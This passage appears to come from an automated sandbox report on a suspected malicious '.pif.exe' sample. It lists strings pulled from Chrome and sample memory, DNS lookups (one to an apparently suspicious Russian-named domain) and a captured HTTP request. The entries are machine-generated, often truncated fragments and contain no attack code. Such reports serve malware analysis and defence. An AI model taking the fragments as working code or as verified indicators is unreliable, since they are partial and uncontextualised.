                    Source: chrome.exe, 0000000A.00000003.1561169617.00002264013C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1561108260.0000226401424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1742843887.0000358400804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                    Source: chrome.exe, 0000000A.00000003.1653924739.0000226401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654098546.0000226401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654254518.0000226401C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                    Source: chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                    Source: chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ogads-pa.clients6.google.com
                    Source: global trafficDNS traffic detected: DNS query: apis.google.com
                    Source: global trafficDNS traffic detected: DNS query: play.google.com
                    Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1host: play.google.comcontent-length: 920sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-mobile: ?0accept: */*origin: chrome-untrusted://new-tab-pagex-client-data: CNOVywE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
                    Source: chrome.exe, 0000000F.00000000.1739947579.0000358400590000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lists.w3.org/Archives/Public/public-svg-wg/2008JulSep/0347.html
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                    Source: chrome.exe, 0000000F.00000000.1732336991.000035840007C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                    Source: chrome.exe, 0000000A.00000003.1658202414.00002264003EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.adobedtm.com
                    Source: chrome.exe, 0000000A.00000003.1563517310.0000226401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578824230.0000226401414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578869310.0000226401424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578924548.00002264004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1747270804.0000358400C98000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743149719.000035840087C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
                    Source: chrome.exe, 0000000F.00000000.1735113352.00003584001EC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: chrome.exe, 0000000F.00000003.1865777375.0000022D00040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
                    Source: chrome.exe, 0000000F.00000003.1865777375.0000022D00040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBQ
                    Source: chrome.exe, 0000000A.00000003.1658102005.0000226401204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1564459571.000022640167C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1577159703.0000226401204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1591542631.00002264011E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000000.1673703016.00004DD4001EC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1735113352.00003584001EC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                    Source: chrome.exe, 0000000E.00000000.1669022979.00004DD00004C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorehttps://chromewebstore.google.com/6EAED1924DB611B6EEF2A664BD077BE7
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                    Source: chrome.exe, 0000000E.00000000.1669022979.00004DD00004C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                    Source: chrome.exe, 0000000B.00000000.1560763334.000052500007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000B.00000000.1559374405.00001A10000A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                    Source: chrome.exe, 0000000B.00000000.1557123423.00001A100002C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000B.00000000.1560165308.000052500002C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report--annotation=channel=--annotation=plat=Win64--annotation=prod=C
                    Source: chrome.exe, 0000000B.00000000.1560870007.000052500008C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report--initial-client-data=0x108
                    Source: chrome.exe, 0000000B.00000000.1560763334.000052500007C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/reporthttps://clients2.google.com/cr/reportP
                    Source: chrome.exe, 0000000B.00000000.1560763334.000052500007C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/reportr
                    Source: chrome.exe, 0000000E.00000000.1669147612.00004DD000068000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: chrome.exe, 0000000A.00000003.1653924739.0000226401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654098546.0000226401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654254518.0000226401C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654177127.0000226401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
                    Source: chrome.exe, 0000000F.00000000.1739947579.0000358400590000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drafts.csswg.org/css-color-adjust-1/#forced-colors-properties
                    Source: chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                    Source: chrome.exe, 0000000A.00000003.1653924739.0000226401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654098546.0000226401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654254518.0000226401C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654177127.0000226401C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                    Source: chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download
                    Source: chrome.exe, 0000000A.00000003.1563724277.000022640162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1563724277.0000226401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1563884586.0000226401580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1724849974.0000022D00100000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1736132934.00003584002C5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1737331837.0000358400350000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1738380608.0000358400468000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743200174.000035840090C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1735113352.00003584001EC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini-autopush.corp.google.com
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini-dev.corp.google.com
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini-preprod.corp.google.com
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini-staging.corp.google.com
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2c
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://geminiweb-pa.googleapis.com/v1/glicStatusb
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                    Source: chrome.exe, 0000000F.00000000.1743591812.0000358400A04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lens.goo
                    Source: chrome.exe, 0000000A.00000003.1563517310.0000226401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578924548.00002264004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1747270804.0000358400C98000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743149719.000035840087C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
                    Source: chrome.exe, 0000000A.00000003.1776783654.00002264003EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/aqahGz3euXadmtmp8NZnuKPoUm4cmewNY0AI1a_cMsC28cfvB2Bx3NArY9Mi50o2zF
                    Source: chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/
                    Source: chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                    Source: chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                    Source: chrome.exe, 0000000F.00000000.1724849974.0000022D00100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.clients6.google.com
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                    Source: chrome.exe, 0000000A.00000003.1777143821.000022640252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
                    Source: chrome.exe, 0000000A.00000003.1777143821.000022640252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
                    Source: chrome.exe, 0000000A.00000003.1777143821.000022640252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1745852517&target=OPTIMIZATION_TARGET_GEO
                    Source: chrome.exe, 0000000A.00000003.1777143821.000022640252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1745938983&target=OPTIMIZATION_TARGET_CLI
                    Source: chrome.exe, 0000000A.00000003.1777143821.000022640252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
                    Source: chrome.exe, 0000000A.00000003.1657903325.00002264011AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                    Source: chrome.exe, 0000000A.00000003.1563517310.0000226401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578869310.0000226401424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578924548.00002264004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1747270804.0000358400C98000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743149719.000035840087C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
                    Source: chrome.exe, 0000000F.00000000.1724849974.0000022D00100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/gemini/answer/13594961?hl=en#location_info&zippy=%2Cwhat-location-informa
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/gemini?p=chrome_PHb
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/gemini?p=chrome_ks_win2
                    Source: chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/gemini?p=chrome_min_win2R
                    Source: chrome.exe, 0000000F.00000000.1739947579.0000358400590000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://svgwg.org/svg2-draft/single-page.html#render-OverflowAndClipProperties
                    Source: chrome.exe, 0000000F.00000000.1740136236.00003584005B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                    Source: chrome.exe, 0000000A.00000003.1658202414.00002264003EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net
                    Source: chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/
                    Source: chrome.exe, 0000000F.00000000.1735113352.00003584001EC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chrome.exe, 0000000F.00000000.1724849974.0000022D00100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/U
                    Source: chrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en-GB&amp;tab=ri&amp;ogbl
